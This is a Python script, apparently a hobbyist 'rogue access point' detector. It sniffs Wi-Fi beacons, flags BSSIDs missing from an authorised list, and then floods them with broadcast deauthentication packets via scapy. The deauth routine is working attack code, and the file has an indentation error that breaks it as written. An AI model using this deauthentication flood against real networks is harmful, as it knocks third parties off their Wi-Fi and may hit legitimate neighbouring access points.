WRIS - Wirelss ROUGE Identification System

#!/usr/bin/env python
# Wirelss ROUGE Identification System
#Developed by @hcjuan04 - twitter
# Credits Airoscapy for channel hooper and and most of the packet analisys method
# Also credits to @RaiderSec

import sys, os, signal
from multiprocessing import Process
import codecs
import commands
import time
import datetime

from scapy.all import *

interface='' # monitor interface
aps = {} # dictionary to store unique APs
ssidarg = '' # SSID to adudit
ifile2 = open('autho.txt', 'r') # Authorized APs
autho=ifile2.readlines() # Authorized APs
unautho = {} # unauthorized AP
p= None

# process unique sniffed Beacons and ProbeResponses.
def sniffAP(p):
    if ( (p.haslayer(Dot11Beacon) or p.haslayer(Dot11ProbeResp)) and not aps.has_key(p[Dot11].addr3)):
        ssid       = p[Dot11Elt].info
        bssid      = p[Dot11].addr3
        channel    = int( ord(p[Dot11Elt:3].info))
        capability = p.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}\
                {Dot11ProbeResp:%Dot11ProbeResp.cap%}")
        # Check for encrypted networks
        if re.search("privacy", capability): enc = 'Y'
        else: enc  = 'N'
        # Save discovered AP
        aps[p[Dot11].addr3] = enc
        # Compare authorized AP
        if ssid.strip() == ssidarg :
        x=0
        # Serch for unauthorized AP
        print "CH ENC BSSID             SSID"
        print "%02d  %s  %s %s" % (int(channel), enc, bssid, ssid)
        while x < len(autho) :
            strautho=autho[x]
            if strautho[0:17] == bssid.strip() :
                print "BSSID: ", bssid, " Authorized"
                x = len(autho)
            elif x == len(autho)-1 :
                print "WARNING - Unauthorized BSSID: ", bssid
                # Saving unauthorized
                unautho[bssid]=channel

                # Wrinting in the Log fiel
                try:
                    flog= open("LOG.txt", "a")
                    try:
                        a=str(datetime.datetime.today())
                        #print a
                        flog.write(a + " WARNING - Unauthorized BSSID: "+ bssid +'\n')
                    finally:
                        flog.close()
                        time.sleep(1)
                except IOError:
                    print "Error appending log file, verify if LOG.txt is present"
                    pass
            x = x + 1

# Channel hopper
def channel_hopper():
    while True:
        try:
            channel = random.randrange(1,15)
            os.system("iw dev %s set channel %d" % (interface, channel))
            time.sleep(1)
        except OSError :
            break

# Capture interrupt signal and cleanup before exiting
def signal_handler(signal, frame):
    global p
    p.terminate()
    p.join()

    print "\n==========  STATISTICS =========="
    print "Total APs found: %d" % len(aps)
    print "Encrypted APs  : %d" % len([ap for ap in aps if aps[ap] =='Y'])
    print "Unencrypted APs: %d" % len([ap for ap in aps if aps[ap] =='N'])
    #print unautho
    print "\n======================================"

# Deauthentication method for Unauthorized APs
def deauth(bssid, client, count):
    pckt = Dot11(subtype=12, addr1=client, addr2=bssid, addr3=bssid) / Dot11Deauth(reason=7)
    cli_to_ap_pckt = None
    if client != 'FF:FF:FF:FF:FF:FF' :
        cli_to_ap_pckt = Dot11(subtype=12, addr1=bssid, addr2=client, addr3=bssid) / Dot11Deauth(reason=7)
    print 'Sending Deauth to ' + client + ' from ' + bssid
    if not count:
        print 'Press CTRL+C to quit'
    while count != 0:
        try:
            for i in range(64):
                # Send out deauth from the AP
                send(pckt)
                if client != 'FF:FF:FF:FF:FF:FF':
                    send(cli_to_ap_pckt)
            count -= 1
        except KeyboardInterrupt:
            break
def main() :
    # Reset global variables
    try :
        while True :
            global aps
            global unautho
            aps = {}
            unautho = {}

            # Start the channel hopper
            global p
            p = Process(target = channel_hopper)
            p.start()
            # Capture timer
            signal.signal(signal.SIGALRM, signal_handler)
            signal.alarm(17)
            # Start the sniffer
            global interface
            sniff(iface=interface,prn=sniffAP,timeout=15)
            #print "Sniff finished"
            time.sleep(3) #Wait for Alarm
            ######### TRIGER #########
            global unautho
            global interface
            if unautho != {} :
                for key in unautho :
                    chan=unautho[key]
                    conf.iface=interface
                    os.system("iw dev %s set channel %d" % (interface, chan))
                    print "set card command: iw dev %s set channel %d" % (interface, chan)
                    deauth(key, 'FF:FF:FF:FF:FF:FF', 50)
                    print "deauthorization attack sent"
    except KeyboardInterrupt:
            print "WRIS terminated"


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print "Usage %s monitor_interface SSID_to_audit" % sys.argv[0]
        sys.exit(1)
    interface = sys.argv[1]
    ssidarg = sys.argv[2]
    print ssidarg
    # Print the program header
    print ""
    print "======= Wirelss ROUGE Identification System - WRIS ======="
    #==================DEBUG
    #import pdb
    #pdb.set_trace()
    main()